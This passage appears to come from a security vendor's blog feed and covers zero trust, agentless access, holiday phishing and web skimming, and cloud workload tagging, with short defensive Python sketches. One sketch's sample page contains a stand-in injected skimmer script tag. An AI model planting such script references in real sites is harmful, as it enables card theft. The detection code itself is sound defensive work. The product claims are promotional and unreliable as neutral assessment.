virtual). In other cases, zero trust is portrayed as the imaginary holy grail of security solutions: a technology that does not really exist but that, at least in theory, could solve all of an organization's problems. 
The reality, however, differs considerably from both of these views. Zero trust is an architecture. It is neither an additional lever for maintaining the status quo nor a mere pipe dream built on an excess of hope and naivety. Zero trust represents a departure from hub-and-spoke networks and castle-and-moat security models; that is why it can so effectively avoid the problems of both. If you'd like to learn more about how it works, click here for more detailed information. You can also get a quick sense of how it works by taking a look at the diagram below. In terms of coverage, this architecture should secure everything and everyone within an organization. Fortunately, this comprehensive definition of zero trust is not merely hypothetical. The ideal scenario is real, and organizations can benefit from it today. Read on to learn about the four key areas protected by a complete zero trust architecture. Zero Trust for Users Your users need fast, secure, and reliable access to applications and the internet from anywhere. This is often the first reason organizations adopt a zero trust architecture: so users can do their work securely and productively without being held back by the shortcomings of the perimeter-based architectures described above. It was largely this need that led Gartner to coin the term security service edge (SSE) to describe security platforms delivered at the edge that provide secure web gateway (SWG), zero trust network access (ZTNA), cloud access security broker (CASB), digital experience monitoring (DEM), and other functionality. However, zero trust (and SSE as well) is about more than just securing users. 
Zero Trust for Workloads Workloads must also be secured with a zero trust architecture if organizations want to prevent data loss and infection by cyberthreats. The term workload covers all kinds of specific services (e.g., virtual machines, containers, microservices, applications, storage, or cloud resources) that are used on demand or are constantly active to accomplish a particular task; AWS S3, for example. Just like users, workloads must be granted secure access to applications and the internet. At the same time, their configurations and entitlements must be set correctly to avoid problems that can lead to data exposure. A zero trust architecture can address both challenges by securing workload communications and providing capabilities such as cloud security posture management (CSPM) and cloud infrastructure entitlement management (CIEM). Zero Trust for IoT and OT The Internet of Things (IoT) and operational technology (OT) are not just empty buzzwords. IoT devices and OT are changing the way organizations operate and have quickly become indispensable assets. Yet despite their importance, and despite the volume and sensitivity of the data they can collect, these devices are not built with security in mind. Organizations must therefore identify these devices across the entire environment, securely grant privileged remote access to them, and ensure that the IoT and OT devices themselves are given secure access to the internet, to applications, and to other devices. Zero trust architecture was designed with precisely these three requirements in mind. Zero Trust for B2B Partners Internal employees are not the only users who need secure, high-performance access to IT systems. B2B suppliers, customers, and other partners have legitimate access needs as well. 
Blocking that access hurts productivity, but granting excessive permissions or network access opens the door to compromise and the lateral movement of threats. A zero trust architecture avoids both problems by adhering to the principle of least privilege (PoLP) and granting B2B partners access only to the specific resources they need. Agentless browser-based access and browser isolation answer the challenge of securing partner devices on which installing software is impractical. The Zscaler Zero Trust Exchange is the One True Zero Trust platform. It offers a modern architecture that provides comprehensive security for all users, workloads, IoT/OT devices, and B2B partners. With Zscaler, your organization can experience firsthand that the zero trust ideal really is a reality. To learn more, register for our webinar that serves as an introduction to zero trust. Wed, 06 Dec 2023 08:00:02 -0800 Jacob Serpa Turbocharge Your BYOD or B2B Initiatives with Secure Agentless Experience Data breaches continue to skyrocket, and their impact is huge, with hefty costs to organizations across all major verticals. In deconstructing this rise in data breaches, two key statistics jump out: 54% of organizational breaches occurred through B2B (business-to-business)/third-party access via external partners and contractors working on unmanaged devices. 71% of surveyed professionals leveraging BYOD (bring your own device) store sensitive work information on personal devices, and 43% of those devices have been targeted with work-related phishing attacks. Double-clicking on these stats provides a user-centric view. 
User-Centric View (requirements) Third-party users, like contractors who may work with multiple organizations, love their independence and want the freedom to use the same (unmanaged) device to serve multiple end clients. Similarly, remote or hybrid employees wish to be highly productive on their own devices, enjoying BYOD flexibility. To optimize the experience for these users, the top requirement is to avoid installing any specialized agents and let the device remain unmanaged. IT-Centric View (challenges) IT lacks control over unmanaged devices, creating business risk. So, enterprises need to prevent data exfiltration and protect applications while gaining full visibility. SaaS adoption can further complicate matters, taking control away from IT. Not to mention, typical access methods may break content (CASB reverse proxy) as well as restrict access to a limited set of SaaS apps. To support application access on unmanaged devices, organizations often use VDI (Virtual Desktop Infrastructure). Recently, the shortcomings of VDI have become clear: it doesn't scale because it's costly and complex, and it still requires an endpoint agent to install and manage. Moreover, modern applications are increasingly web or browser-based, and streaming an entire desktop via VDI doesn't make for a good end user experience. Introducing the Zscaler Approach: A Secure, Agentless Experience With Zscaler, end users authenticate into a portal for a dashboard view of their sanctioned SaaS and private web apps, without the need for an endpoint agent or forcing them to use anything but their favorite browser. This is because app access is provided through Zscaler Browser Isolation running under the hood, creating an isolated browser instance within an ephemeral cloud container that sends all traffic through the natively integrated policies and controls of the Zscaler Zero Trust Exchange. 
With this platform, users enjoy a managed-device experience and security on whichever device they please. Zscaler Browser Isolation streams experience-optimized pixels back to the user's device without sending the actual data, enforcing clipboard or read-only controls, restricting upload/download and print options, and providing capabilities such as watermarking. Using its file isolation capability and built-in document processing technology, users can view docs or share files (across apps, both SaaS and private, as per policy) without having to download them to their unmanaged device. The integrated Zscaler DLP (data loss prevention) suite provides comprehensive data protection, and all traffic goes through full inline inspection and security policy enforcement via the Zero Trust Exchange, while integrated logging provides deeper visibility. Access to SaaS apps is provided uniquely and seamlessly. Some apps may use legacy authentication methods, but the Zscaler architecture can still ensure MFA (multi-factor authentication), so you can adhere to your organization's security standards. Moreover, users have the flexibility to access apps from any device, be it a desktop, touch-screen laptop, or even mobile. This architecture also provides application protection. Private web apps are hidden from the internet by the Zero Trust Exchange, reducing their attack surface. Moreover, Isolation obfuscates the application headers and hides the application's anatomy (protocol, OS versions, software components, etc.), further shrinking the attack surface by stopping attackers from using malware-infected, unmanaged devices to exploit these apps. Depending on the use case requirements, Zscaler Browser Access can provide native (non-isolated) access to these apps as well. Leveraging Zscaler Privileged Remote Access, users can also access internal servers, desktops, jump hosts, and other OT/IT/IoT devices via a web-based RDP/VNC/SSH mechanism through the portal. 
As per policy configuration, access to systems and devices can be restricted to a specific timeframe. Plus, with session recording capability, admins can perform detailed audits through video recordings and gain deeper insight into user behavior patterns. Zscaler SSE platform Holistically, the Zscaler SSE (Security Service Edge) platform provides secure access for both managed and unmanaged devices. Get started on your BYOD or B2B journey now! In a nutshell, Zscaler respects an end user's ideal of keeping their device unmanaged, without requiring an endpoint agent, turbocharging your organization's BYOD and B2B initiatives. Drop us a line for a quick demo, or sign up for a workshop! We will guide you on your zero trust journey, so you can boost user productivity without compromising security, and accelerate your innovation path. Experience the One True Zero! Fun fact: BYO has its origins in BYOB, and it's suggested that in the early 19th century BYOB was a societal term for "Bring Your Own Basket" at picnics. Thu, 16 Nov 2023 08:00:01 -0800 Amit Jain How to stay protected on the web this holiday season Introduction It should come as no surprise that while online shopping spikes during the holiday season, there is also a marked increase in cyber attacks capitalizing on holiday-themed offers and promotions. Zscaler ThreatLabz has been observing web threats for many years. While the attacks have evolved over time, they share a few commonalities that enable us to recommend how online shoppers (users) can protect themselves and how security teams can safeguard corporate data. This blog examines recurring attack trends during the holiday season and provides key recommendations to protect sensitive information. In addition, this blog explains how Zscaler Advanced Threat Protection mitigates web-based threats like phishing and web skimming. Phishing Attacks Over the years, phishing scams have become more sophisticated, making them harder to detect and block. 
By leveraging phishing kits and AI tools, even non-technical malicious actors can plan and execute highly targeted phishing campaigns, compromising organizations to access sensitive data for exfiltration and/or extortion. The Zscaler ThreatLabz 2023 Phishing Report indicates that phishing attackers exploit certain consumer trends by impersonating popular brands to deceive consumers. Malicious e-commerce sites and emails are popular phishing tactics during the holiday season because of the heavy online shopping and spending that occurs during this period. A widely employed method of phishing involves using trusted domains to exploit unsuspecting consumers, redirecting them to phishing websites. Malicious actors abuse popular online shopping platforms such as Walmart and Amazon in an attempt to collect login credentials. Attackers send free gift cards via email, post ads, or send fake customer service alerts in an attempt to manipulate victims into clicking on phishing links. In addition to popular online shopping websites, banking and personal finance sites become frequent targets during the holiday season. Some attacks are served over non-secure connections using HTTP and are easy to spot. However, they can also be more elaborate and sophisticated, served over an HTTPS connection with an interface that seems like a legitimate banking and finance website. In 2019, PayPal phishing scams were executed widely by malicious actors. A blog by the Zscaler ThreatLabz team drills into how the threat actors executed the attacks successfully. In recent years, attackers have also engaged in smishing, i.e., using text messages (SMS communications) to deliver scams, typically with malicious URL links. The message sender appears to be a known e-commerce brand or famous online shopping website. A text message with a tracking link might divert a user to a malicious site that looks legitimate. 
In the past, Zscaler ThreatLabz has observed these seemingly innocuous websites luring unsuspecting users with polls and surveys that promise monetary rewards. Web Skimming Attacks Historically, the e-commerce sector has faced the brunt of skimming attacks, which focus on capturing sensitive data such as online shoppers' credit card information. In recent years, web skimming attacks have become increasingly popular among malicious actors, given that they are easy to execute and hard to detect. What makes these attacks even harder to detect is that they are commonly launched over encrypted (SSL) channels, and many organizations don't inspect encrypted traffic. Card skimmer groups are active throughout the year, but given the increased online shopping activity during the holiday season, there usually is a spike in such attacks around this time. Last year, ThreatLabz identified four emerging skimming attacks to watch, with little to no prior documentation in the public domain. The ThreatLabz research team discovered that Magento- and Presta-based e-commerce stores in the US, UK, Australia, and Canada were primarily targeted, with attackers managing to keep their malicious activities under the radar for several months. Malicious actors using skimming attacks tend to use newly registered domains that appear similar to legitimate web services or web analytics services, allowing them to remain undetected for long periods and infect multiple e-commerce websites. JavaScript skimmer code is hosted on attacker-registered domains, and links to these skimmers are injected into compromised e-commerce websites. Sometimes, the skimming attacks rely on heavy JavaScript obfuscation, which makes detection even more difficult. 
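As a rough illustration of why attacker-registered "analytics-like" domains work, a site owner can audit rendered pages for script references that fall outside a first-party allowlist. The sketch below uses only the Python standard library; the domains, allowlist, and page content are hypothetical, and real skimmers that inject code via obfuscated inline JavaScript would need deeper analysis than this.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: domains this storefront legitimately loads scripts from.
ALLOWED_SCRIPT_DOMAINS = {"shop.example.com", "cdn.example.com"}

class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag on a page."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)

def find_suspect_scripts(html: str) -> list:
    """Return external script URLs whose domain is not on the allowlist."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    return [
        src for src in collector.sources
        if urlparse(src).netloc and urlparse(src).netloc not in ALLOWED_SCRIPT_DOMAINS
    ]

# A page with one legitimate script and one injected, analytics-lookalike skimmer link.
page = """
<html><body>
<script src="https://cdn.example.com/checkout.js"></script>
<script src="https://web-analytics-stats.example.net/track.js"></script>
</body></html>
"""
print(find_suspect_scripts(page))  # prints the lookalike URL only
```

A periodic audit like this catches injected external references, which is one reason skimmer operators increasingly hide behind obfuscated inline code instead.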
Guidelines for Users Shopping on Corporate Devices Users engaging in online shopping should follow the basic guidelines outlined below to protect their personal information and corporate data: Avoid holiday shopping on any corporate device, keeping web threats away from corporate assets. If an advertised deal seems too good to be true, it probably is. Be particularly wary of these offers and pay close attention to any associated web pages and links. Download apps from large official app stores, such as Google or Apple, as they generally have stronger governance. Verify the authenticity of a URL or website before accessing it. Be wary of links with typos. When visiting shopping, e-commerce, or financial websites, check for HTTPS/secure connections. All legitimate vendors, retailers, and payment portals use HTTPS connections for their transactions. Enable two-factor authentication, or "2FA," to provide an additional layer of security, especially for sensitive financial accounts. As a rule, don't click links or open documents from unknown parties who promise exciting offers and opportunities. Always ensure that your operating system and web browser are up to date and have the latest security patches installed. Use a browser add-on, such as Adblock Plus, to block malvertising (compromised/malicious websites bombard visitors with pop-up ads). Avoid using public or unsecured Wi-Fi connections for shopping. Recommendations for Enterprise Security Teams Given the spikes in cyber attacks during the holiday season, it is important to raise user awareness. Leverage the above section on "guidelines for users" to educate your user base. Utilize web policies that restrict access to unknown, miscellaneous, newly registered, and newly active domains. If there are legitimate business use cases for these websites, leverage browser isolation to enable safe access. 
Turn on SSL/TLS traffic inspection to gain visibility and the ability to apply advanced security controls, such as phishing detection, IPS, and inline sandboxing, to all traffic. If you are an e-commerce company, ensure that your own infrastructure is not exploited by keeping all systems patched and up to date, utilizing secure passwords and MFA, and following PCI compliance guidelines. While the above recommendations are especially critical during the holiday season, improving and maintaining your security posture is important throughout the year. Zscaler Advanced Threat Protection Helps Safeguard Data During the Holidays Traditional threat protection comes with its own downsides: inspecting traffic from start to finish is challenging; appliance-based and VM approaches cannot perform 100% SSL/TLS decryption; traditional sandboxing solutions don't operate inline, which means they can only detect malware after it has compromised your systems; and the minute your users drop off the network or VPN, you lose the ability to enforce policies. This is why we recommend Zscaler Advanced Threat Protection. When it comes to phishing attacks, Zscaler Advanced Threat Protection utilizes its cloud-native proxy to inspect web traffic comprehensively. It leverages advanced threat intelligence and behavioral analysis to identify and block malicious websites attempting to deceive users. For combating web skimming, Zscaler Advanced Threat Protection's approach involves thorough inspection of web content and transactions. By scrutinizing every packet of data, it can detect and block attempts by malicious actors to inject code into legitimate websites. Zscaler's focus on encrypted traffic means its unlimited SSL inspection capacity allows it to uncover hidden threats within encrypted communication, a common tactic employed by web skimmers. 
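Two of the shopper guidelines earlier, checking for HTTPS and being wary of typos in links, can be roughly automated. This Python sketch is a simplified heuristic, not a product feature: the brand list and the 0.8 similarity threshold are assumptions chosen for illustration, and real typosquat detection uses far richer signals (domain age, registrar, homoglyphs).

```python
from urllib.parse import urlparse
from difflib import SequenceMatcher

# Hypothetical list of brands a user actually shops with.
KNOWN_SHOPS = {"amazon.com", "walmart.com", "paypal.com"}

def check_shopping_url(url: str) -> list:
    """Return a list of warnings for a URL, applying two of the guidelines above."""
    warnings = []
    parts = urlparse(url)
    # Guideline: legitimate retail and payment sites use HTTPS.
    if parts.scheme != "https":
        warnings.append("not served over HTTPS")
    host = parts.netloc.lower()
    # Guideline: be wary of typos, i.e. domains that look like, but are not, a known brand.
    for shop in KNOWN_SHOPS:
        similarity = SequenceMatcher(None, host, shop).ratio()
        if host != shop and not host.endswith("." + shop) and similarity > 0.8:
            warnings.append(f"looks suspiciously similar to {shop}")
    return warnings

print(check_shopping_url("http://amaz0n.com/deals"))
# prints ['not served over HTTPS', 'looks suspiciously similar to amazon.com']
```

The same check returns an empty list for a genuine HTTPS brand URL, which is why such heuristics are usually layered with allowlists rather than used alone.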
Take a look at how VF Corporation, which includes brands like Timberland, The North Face, and Vans, went through a zero trust journey powered by Zscaler, enabling it to improve threat protection with threat insights from the world's largest security cloud. Wed, 15 Nov 2023 09:02:02 -0800 Apoorva Ravikrishnan Channel Reinvented: Highlights from EMEA Partner Summit 2023 Fresh off a flight, I'm excited to share with you some of the amazing highlights from the EMEA Partner Summit in Alicante, Spain, which took place on November 7-8. This year's summit was an incredible opportunity for us to connect with our partners from around the EMEA region and gain valuable insights and feedback that will shape the future of our partnership. Throughout the two-day summit, the Zscaler team warmly welcomed over 100 strategic partners to join us for an immersive experience that will surely go down as one for the books. The summit showcased a range of new initiatives and innovations on the Zscaler Zero Trust Exchange platform, including cutting-edge technologies like AI, ML, and IT/OT. These advancements empower our partners to seize the latest opportunities in the industry, and throughout the week we shared strategies for unlocking new revenue streams, enhancing services, and driving remarkable business growth. Undoubtedly, one of the summit's highlights was the chance to shine a spotlight on leaders across every function of Zscaler, from Product Leadership to Solutions Consulting and Professional Services. These executives were present to demonstrate their unwavering support, engage with partners, and present the Zscaler roadmap. It was inspiring to see how partners are threaded through every aspect of our strategy, and how crucial your collaboration is in driving our mutual success. The agenda was also jam-packed with sessions from my leadership team that explored our channel transformation journey and the current state of the channel. 
We had some amazing discussions with our EMEA sales leadership team on partnership enhancement, collaboration, and growth, and how we have aligned more strongly internally to support our partners externally. It was truly inspiring to see how everyone came together in an environment of open dialogue and shared goals, and it was a great time for us to debut several of our new programs, from partner rebates and spiffs to a certification rewards program for sales engineers coming soon! Overall, it was an incredible experience that left us feeling energized and excited for what's to come. In addition to the engaging sessions, we had a blast celebrating our shared success and giving well-deserved recognition to our incredible Channel and Ecosystem Partners - Great Gatsby style! These outstanding partners have truly gone above and beyond in their collaboration with us, and we couldn't be more grateful for their exceptional commitment and dedication. Congratulations to our esteemed winners: EMEA Service Provider of the Year: BT EMEA Systems Integrator of the Year: NTT EMEA Solution Provider of the Year: Softcat EMEA Technology Alliance Partner of the Year: AWS EMEA North Partner of the Year: Computacenter EMEA South Partner of the Year: Verizon EMEA MVP Partner of the Year: Orange EMEA Growth Partner of the Year: Help Information Technology Consultancy EMEA Technical Partner of the Year: Deutsche Telekom EMEA Business Partner of the Year: Serviceware These awards recognize our partners who have demonstrated excellence in their respective categories. These companies have shown exceptional commitment, dedication, and innovation in their partnership with Zscaler, and we are proud to have them as part of our ecosystem. I want to take this opportunity to thank all our partners who joined us at the 2023 EMEA Partner Summit. Your input really is invaluable to us, and we appreciate your commitment to our shared success. 
I am confident that together, we can continue to drive innovation, growth, and success for our customers. Finally, I want to extend my sincere appreciation to Blanca Gallatero, VP, EMEA Partners & Alliances, and her team for their hard work and dedication in organizing this year's summit. It was a phenomenal event that exceeded all expectations, and we are grateful for your unwavering support. Thank you again for being an integral part of our ecosystem, and I look forward to continuing our partnership in the years to come. Tue, 14 Nov 2023 08:00:01 -0800 Karl Soderlund Extending Zero Trust for Workloads in Google Cloud and China Region Global enterprise organizations are rapidly expanding their application footprints across multiple public clouds to leverage the unique capabilities of each cloud provider and mitigate lock-in risks. However, this multicloud adoption significantly expands security risks. Unfortunately, legacy security architectures that retrofit on-premises models for multicloud are outdated and obsolete. To address these challenges, Zscaler has extended its zero trust architecture to provide secure connectivity for cloud workloads in Amazon Web Services (AWS) and Microsoft Azure. Today, we announce the availability of Zscaler Workload Communications in Google Cloud Platform, Azure public cloud regions in China, and AWS GovCloud, along with our FedRAMP certification. Customers can now confidently extend their deployments and benefit from the world's largest inline cloud security platform with consistent security and segmentation policies. China Region Support Many industries such as technology, life sciences, and financial services are undergoing accelerated business transformations. They require deploying application workloads in public clouds closer to their employees for enhanced innovation and productivity. 
As organizations tap into the global footprint for resources and talent, we see a rapid rise in expansion into countries like China. They aim to provide consistent access and user experience to employees, regardless of their location. However, deploying workloads in public clouds for the China region poses the following challenges: Strict Great Firewall (GFW) inspection Random bandwidth throttling Spurious DNS injections for compliance enforcement Poor connectivity, often with high packet loss and latency In response, Zscaler launched China Premium Access to help customers with enhanced connectivity and security. Many of our customers sought an extension of zero trust architecture for workloads deployed in public cloud regions of China, especially Microsoft Azure. Today, with this announcement, customers can seamlessly extend cloud workloads to the Azure Beijing and Hebei regions with the benefits of: Purpose-built workload communications for China regions adhering to all local compliance mandates Centralized and granular policy for workload egress traffic to domestic China or international websites Additional monitoring to maintain country-specific risk and compliance requirements GCP Support Business transformation acceleration is happening across industry verticals with the adoption of modern application frameworks like microservices, serverless, and the new epoch of applications built on generative AI. One of Zscaler's largest financial services customers embarked on a multicloud expansion with workloads deployed in Azure and GCP. Key drivers for the expansion were: Adopting GCP's shared VPC architecture with granular workload egress security Enhancing website chatbots based on a gen AI copilot with better security Extending threat protection and SSL inspection capabilities This customer has now deployed Zscaler Workload Communications in Azure and GCP with a single shared VPC and centralized infrastructure design. 
This flexible design enables workload deployments across multiple regions. They have benefited from minimal changes to existing network routing configurations, advanced policy-based SSL inspection, and strict data protection policies with inline SSL decryption for full visibility into Gen AI user queries and downloaded content. In summary, these innovations and platform expansion for Zscaler Workload Communications will significantly improve business agility, end-user experience, and security for our customers’ workloads in multicloud. To learn more about the capabilities of Workload Communications, visit the product page here. Watch our launch event to hear more about our extended cloud support here. Wed, 08 Nov 2023 04:00:01 -0800 Sreekanth Kannan How to Enable User-Defined Tags as Identity for Securing Cloud Workloads Public cloud environments often contain dynamic workloads, with instances created and deprecated frequently. As applications transition to the cloud, it's crucial that they have the same protection as they would in an on-premises data center. In data centers, identity (as it applies to security policy) is closely linked to static elements like hostnames, subnets, and IP addresses. However, the elastic nature of the public cloud can make static approaches challenging, potentially leading to business delays and increased security risks. Protecting workloads in the cloud requires dynamic policy constructs for workload identification, and for this, cloud native attributes and user-defined tags are effective tools. Attributes offer deterministic methods for managing workloads, such as OS type, VPC ID, subnet ID, and security group ID. However, tags are particularly interesting due to their customizability, mature enforcement capabilities, and widespread usage among customers. These tags/attributes are key–value pairs associated with each cloud resource. 
As user-defined tags have developed, security teams have sought ways to incorporate them into security policies. Some security solutions can use tags in security policies, but operationalizing tags in these solutions is challenging due to: Limited scalability Challenges in cross-account deployments Difficulties in supporting overlapping IP address space Announcing zero trust security for cloud workloads using cloud native tags and attributes Zscaler Workload Communications is the modern approach to securing your cloud applications and workloads. With secure zero trust cloud connectivity for workloads, you can eliminate your network attack surface, stop lateral threat movement, avoid workload compromise, and prevent sensitive data loss. It uses the Zscaler Zero Trust Exchange™ platform to secure cloud workloads, enabling your organization to stop malicious access with explicit trust-based security that leverages identity, risk profiles, location, and behavioral analytics. We're pleased to announce support for AWS user-defined tags and attributes in security policies within the Zero Trust Exchange. Customers can apply security policies to cloud workloads using the tags and attributes associated with those workloads. There are three main components to the solution: 1. Workload Discovery service This Zscaler-managed service finds workloads and corresponding tags/attributes in an AWS account associated with AWS resources like VMs, VPCs, subnets, and ENIs. Customers don't need to install any additional components in their AWS account. The service discovers tags per AWS region and can be targeted to the regions where workloads are located. Permissions are configured via the Zscaler administration portal, enabling AWS accounts to be onboarded in minutes. Once onboarded, all tags and their associated workloads in an account are discovered and ready to be used in Zscaler security policies. The service supports both pull and push modes for tag discovery. 
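To make the pull-mode idea concrete, here is a schematic Python sketch of tag discovery against a mocked, AWS-style API response. The response shape, resource IDs, and field names are invented for illustration, since the discovery service's internals are not public; the point is simply how per-region responses collapse into a tag-keyed workload inventory.

```python
# Mocked, AWS-describe-style response: resources per region, each carrying
# its user-defined tags as key-value pairs. All values are hypothetical.
MOCK_API_RESPONSE = {
    "us-east-1": [
        {"resource_id": "i-0abc", "ip": "10.0.1.5",
         "tags": {"App": "Api", "environment": "production"}},
        {"resource_id": "i-0def", "ip": "10.0.1.6",
         "tags": {"App": "Web", "environment": "staging"}},
    ],
}

def discover_workloads(regions):
    """Pull-mode discovery: collect workloads and their tags for the given regions."""
    inventory = {}
    for region in regions:
        for res in MOCK_API_RESPONSE.get(region, []):
            inventory[res["resource_id"]] = {
                "region": region,
                "ip": res["ip"],
                "tags": res["tags"],
            }
    return inventory

inv = discover_workloads(["us-east-1"])
print(sorted(inv))  # prints ['i-0abc', 'i-0def']
```

Targeting discovery to specific regions, as the parameter above does, is what keeps the inventory small in accounts whose workloads are concentrated in a few regions.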
Figure 1 shows the Workload Discovery service operating in Zscaler's AWS account, identifying the workloads in Acme Corp’s AWS account. Figure 1: Workload Discovery service 2. Tag metadata propagation Once identified, user-defined tags, attributes, and associated workload information are automatically transmitted to the Cloud Connectors linked with the corresponding AWS account. Cloud Connectors are lightweight virtual machines that act as traffic forwarding gateways in customer VPCs/accounts. They securely tunnel the egress traffic from workloads to the Zero Trust Exchange, where security policies are applied. Customers can leverage both Zscaler Internet Access™ (ZIA™) and Zscaler Private Access™ (ZPA™) policies to protect workload communications with public applications on the internet or private applications in the same or a different cloud/region. Zscaler provides and maintains the OS and software for these connectors. Figure 2 shows how the Workload Discovery service propagates the tag and associated workload information to Cloud Connectors linked to Acme Corp’s AWS account. This metadata contains the IP address, the key–value pairs for user-defined tags and attributes, and other information needed to identify the workload. Figure 2: Tag metadata propagation 3. Rules engine Tag- or attribute-based security policies are incorporated into the Zero Trust Exchange platform’s rules engine. A new policy object has been introduced to group one or more tags or attributes together. Customers can now utilize logical Boolean operators to create a workload group and apply policies accordingly. As shown in Figure 3, a user creates a workload group for API servers in a production environment (Tag-Name=App, Tag-Value=Api) & (Tag-Name=environment, Tag-Value=production). This user can then configure security policies for this group.
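The Boolean group-matching described above can be sketched in a few lines; the function and tag names are illustrative, not the rules engine's actual implementation. The "API servers in production" group from the example requires both pairs to match (AND semantics).

```python
def matches_group(workload_tags, required_pairs):
    """AND semantics: every required (key, value) pair must be present."""
    return all(workload_tags.get(k) == v for k, v in required_pairs)

# Mirrors (Tag-Name=App, Tag-Value=Api) & (Tag-Name=environment,
# Tag-Value=production) from the example above.
api_prod_group = [("App", "Api"), ("environment", "production")]
```

A workload tagged `{"App": "Api", "environment": "staging"}` would fall outside the group, so production-only policies never touch it.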
Figure 3: Creating a group of API servers in a production environment Figure 4 demonstrates a user creating a policy to apply URL filtering to this group of API servers in the Zero Trust Exchange rules engine. Figure 4: Zero Trust Exchange Rules Engine Extension This includes support for advanced security policies like SSL inspection, URL classification (for domain and path), data loss prevention, and firewall policies with AppID. These capabilities enable granular and consistent application of security policies in dynamic cloud environments. A simpler alternative for managing security in cross-account deployments with overlapping IP addresses Gateway Load Balancer (GWLB) VPC endpoints offer the ability to direct workload traffic from a workload VPC to a central security VPC. This is achieved without the need for a transit gateway (TGW) or VPC peering by using the AWS PrivateLink service. The workload and security VPCs can exist in the same or different AWS accounts. This arrangement can simplify cloud deployments by centralizing egress traffic in a single security VPC, eliminating the need to configure TGW attachments for each workload VPC. It can also reduce AWS data charges. Moreover, GWLB VPC endpoints enable workload VPCs with overlapping IP addresses to connect to the same central VPC. Zscaler's tagging support can seamlessly address both of these situations. Customers can apply tag/attribute-based policies for cross-account architectures and overlapping IP address scenarios. This ensures that the right policies are applied to the intended workloads. Enhanced protection at cloud scale, offering both granularity and flexibility 1. Cloud native scale Zscaler supports the maximum number of tags allowed by the cloud service provider, including individual resource-level tags as well as VPC and subnet tags. In situations where SecOps/DevOps teams cannot fully enforce tags, Zscaler supports the use of provider-generated attributes.
These attributes (VPC ID, subnet ID, security group, etc.) can also be used in security policies. 2. Flexibility As cloud deployments evolve, many customers utilize a mix of (a) distributed and/or centralized security, (b) single- and/or multi-account architecture, and (c) unique and/or overlapping IP addressing. Zscaler's approach is compatible with all of these combinations. 3. Advanced security capabilities Tags can be used across the Zero Trust Exchange platform’s suite of services, including advanced security features such as: SSL inspection and URL filtering, which support both domain and path Advanced firewall policies to protect web and non-web traffic using network applications, network services, and destination domains, among others Comprehensive inspection with DLP, supporting Exact Data Match (EDM), Indexed Document Match (IDM), and Optical Character Recognition (OCR) Securing workloads in the public cloud requires a scalable, adaptable solution that can apply consistent policies based on workload identity. This latest addition to the Zscaler Workload Communications product suite allows you to apply security policies using cloud service provider tags and attributes. Natively integrated with the Zero Trust Exchange, this capability is available to all Zscaler customers, without any need to deploy additional components. To find out more, visit our product webpage and watch the webinar. Wed, 08 Nov 2023 04:00:01 -0800 Mrigank Singh Unleashing the Power of the Largest Security Cloud for High-Performance SSL Inspection of Cloud Workloads In the dynamic and evolving landscape of cloud-based workload traffic, Secure Sockets Layer (SSL) encryption is a critical pillar, as it comprises a staggering 90% of all internet traffic and an even higher share (96%) of all workload egress traffic. While SSL encryption safeguards data transfer, it also provides an ideal channel for malicious actors to export data without detection by security devices.
This has led to a growing concern and need for SSL inspection of egress traffic. The security and performance challenge SSL inspection often relies on customized compute infrastructure to ensure consistent traffic performance. This is because hardware offloading components are necessary for decrypting and re-encrypting SSL sessions to enable deeper levels of inspection. Cloud providers offer FPGA-based instance types that can be used for the hardware offloading required for SSL decryption/encryption. However, these FPGA-based instances are expensive (around 5 times the cost of similar non-FPGA instances) and may demonstrate unpredictable performance for high-throughput inspection. On the other hand, security appliances like virtual Next-Generation Firewalls (NGFWs) using standard instance types experience a significant drop in performance when SSL inspection is enabled, with performance degradation of up to 60%. Modern cloud-native applications are designed in a modular fashion using microservices architecture. These applications take advantage of the SaaS solutions available for various components such as analytics, logging, workflows, authentication, software updates, LLMs, and more. These services are offered by SaaS platforms like Dynatrace, Datadog, ServiceNow, Okta, OpenAI, and others. Moreover, software updates from open-source repositories such as Python, Java, Linux, FreeBSD, and Ubuntu are crucial for patching vulnerabilities and keeping applications up to date. Consequently, modern cloud-native applications generate a significant amount of egress traffic destined for diverse destinations. To ensure secure communication for these applications, it is essential to perform a thorough and comprehensive inspection of outbound traffic, which necessitates SSL inspection.
Image 1: Workload egress traffic destined for diverse destinations Public clouds, being distributed globally, have made it possible for enterprises to deploy applications in closer proximity to their users. It is common for applications to be deployed in multiple regions to cater to nearby users. Furthermore, each business unit may have its own account or subscription for the purpose of cost allocation. As a result, network and security teams are now faced with the challenge of managing and rotating SSL certificates for security appliances across multiple regions, accounts, and subscriptions. This responsibility of certificate management and rotation becomes even more burdensome as the number of virtual NGFW appliances continues to grow. To add further complexity, not all applications are compatible with SSL inspection. Applications that have certificate pinning enabled or legacy applications that cannot trust an intermediate certificate may terminate their connections when SSL inspection is enabled. Additionally, certain application vendors like Microsoft and Zoom do not recommend decrypting egress traffic for specific applications due to network connectivity principles or latency sensitivity. This necessitates the need for more precise controls to inspect SSL traffic for desired applications. When enabling SSL inspection, security operations (secops) teams need to enforce foundational SSL encryption parameters. These parameters include minimum encryption levels, preferred encryption methods, desired encryption strength, and minimum protocol version. Customers in highly regulated industries are obligated to adhere to stringent security and privacy requirements. This often involves demonstrating the use of the most secure SSL parameters while inspecting application traffic. 
Therefore, they require a method to retrieve SSL inspection parameters, including encryption levels, methods, strength, and protocol version information, from the security vendor or device responsible for SSL inspection. Customers are seeking a solution that can provide SSL inspection with consistent performance, is easy to use, and supports versatile deployments. The Power of High-Performance SSL Inspection To tackle this crucial security challenge, Zscaler provides high-performance SSL inspection for application egress traffic at cloud scale, ensuring no drop in performance. Zscaler's solution is compatible with cloud native components like AWS Gateway Load Balancer (GWLB), Azure Internal Load Balancer, and GCP internal load balancer. It can scale up to handle the maximum throughput supported by these cloud native components while maintaining optimal performance. The Zscaler Zero Trust Exchange platform utilizes specialized infrastructure across its 150+ data centers to perform SSL inspection at scale for globally distributed customer traffic. For customers using Zscaler Workload Communications to enable zero trust for cloud workload traffic, Zscaler provides a cloud connector. This cloud connector is a virtual machine (VM) that acts as a forwarding gateway to Zscaler's Zero Trust Exchange. These VMs can be scaled vertically or horizontally to securely tunnel workload traffic from public clouds to the Zero Trust Exchange for SSL inspection. The Zero Trust Exchange processes and protects over 350 billion transactions per day, with 90% of these transactions being SSL encrypted.
